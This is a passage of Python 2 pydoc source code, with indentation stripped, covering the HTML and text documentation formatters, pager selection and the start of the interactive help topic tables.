modules = inspect.getmembers(object, isnonbuiltinmodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(_binstr(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(_binstr(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
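# Overstriking (char, backspace, char) is the classic way to signal
# bold text to terminal pagers such as 'less'.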
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', _binstr(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', _binstr(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', _binstr(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
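# Note the self-replacing trick above: the module-global name 'pager' is
# rebound to the concrete pager on first use, so getpager()'s detection
# logic runs only once per process.  Illustrative sequence:
#   pager('first chunk of text')   # picks a pager via getpager()
#   pager('second chunk of text')  # reuses the already-chosen pager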
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not hasattr(sys.stdin, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
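# The boldface produced elsewhere in this module uses the terminal
# overstrike convention (each character emitted as char + backspace +
# char); plain() strips those "char + backspace" pairs.  For example:
#   plain('N\x08NA\x08AM\x08ME\x08E') == 'NAME'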
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(_encode(text))
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(_encode(text))
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = int(os.environ.get('LINES', 25)) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding)))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
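# Illustrative results:
#   describe(len)  -> 'built-in function len'
#   describe(dict) -> 'class dict'
#   describe(3)    -> 'int'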
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
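# For example, locate('os.path.join') imports os and os.path as needed
# and returns the join function, while an unresolvable dotted path such
# as locate('os.path.nosuchname') returns None.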
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
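# For instance, 'elif' above is a plain alias for the 'if' entry, while
# 'for' maps to the ('for', 'break continue while') label/see-also pair.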
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
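# After this merge each symbol maps to a space-separated topic list; for
# example '<' (listed under both OPERATORS and COMPARISON above) ends up
# with both topics, though their order depends on dict iteration order:
#   sorted(Helper.symbols['<'].split()) == ['COMPARISON', 'OPERATORS']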
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
